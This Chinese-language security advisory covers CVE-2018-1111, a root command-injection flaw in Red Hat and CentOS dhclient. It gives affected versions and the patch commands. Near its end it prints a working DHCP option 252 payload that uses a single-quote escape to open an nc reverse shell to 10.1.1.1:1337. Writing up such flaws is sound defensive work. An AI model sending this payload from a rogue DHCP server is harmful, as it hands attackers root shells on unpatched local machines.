Red Hat DHCP客户端命令执行漏洞是怎么样的

这篇文章给大家介绍Red Hat DHCP客户端命令执行漏洞是怎么样的，内容非常详细，感兴趣的小伙伴们可以参考借鉴，希望对大家能有所帮助。

0x00 漏洞概述

近日，红帽官方发布了安全更新，修复了编号为CVE-2018-1111的远程代码执行漏洞，攻击者可以通过伪造DHCP服务器发送响应包，攻击红帽系统，获取root权限并执行任意命令。

目前相关利用代码已经公开，可用于本地网络攻击；360-CERT此漏洞进行了技术分析，认为该漏洞危害等级严重，建议使用相关用户尽快进行更新。

0x01 漏洞影响面

影响版本

• Red Hat Enterprise Linux Server 6

• Red Hat Enterprise Linux Server 7

• CentOS 6

• CentOS 7

修复方案

• 受影响产品的更新

• 软件包更新

    #yum update dhclient 
    #rpm -qa --changelog dhclient  | grep CVE-2018
        - Resolves: #1570898 - Fix CVE-2018-1111: Do not parse backslash as escape character
  

0x02 漏洞详情

DHCP 是一个局域网的网络协议，主要用于内部网络动态IP地址分配。

Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient（Red Hat Enterprise Linux 7）和/etc/NetworkManager/dispatcher.d/10-dhclient（Red Hat Enterprise Linux 6）；当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。

使用单引号使参数值逃逸成功，导致了命令执行

--dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #"

关于Red Hat DHCP客户端命令执行漏洞是怎么样的就分享到这里了，希望以上内容可以对大家有一定的帮助，可以学到更多知识。如果觉得文章不错，可以把它分享出去让更多的人看到。